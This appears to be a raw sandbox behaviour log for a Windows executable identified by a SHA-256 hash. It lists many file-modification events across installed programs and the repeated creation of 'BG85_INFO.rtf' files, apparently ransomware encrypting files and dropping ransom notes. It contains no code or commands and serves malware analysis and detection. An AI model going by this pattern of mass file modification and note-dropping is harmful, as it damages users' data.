c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Paramaribo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\master_preferences c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\CompleteSplit.tif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Honolulu c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstack.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ir.idl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_pt_BR.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Jamaica c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kiev c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoDev.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Detroit c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fr.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search5.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\th.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Auckland c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\LICENSE c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Iqaluit c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Belgrade c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pontianak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe.sig c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\BackupClose.tiff c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\javacpl.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\jp2launcher.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fil.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_fr.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\jfxrt.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Moscow c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-3 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guam c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wallis c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\kn.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Gaza c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\Templates\Graph.jtp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ru.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Syowa c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\mr.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Marengo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\alt-rt.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Creston c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Funafuti c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification 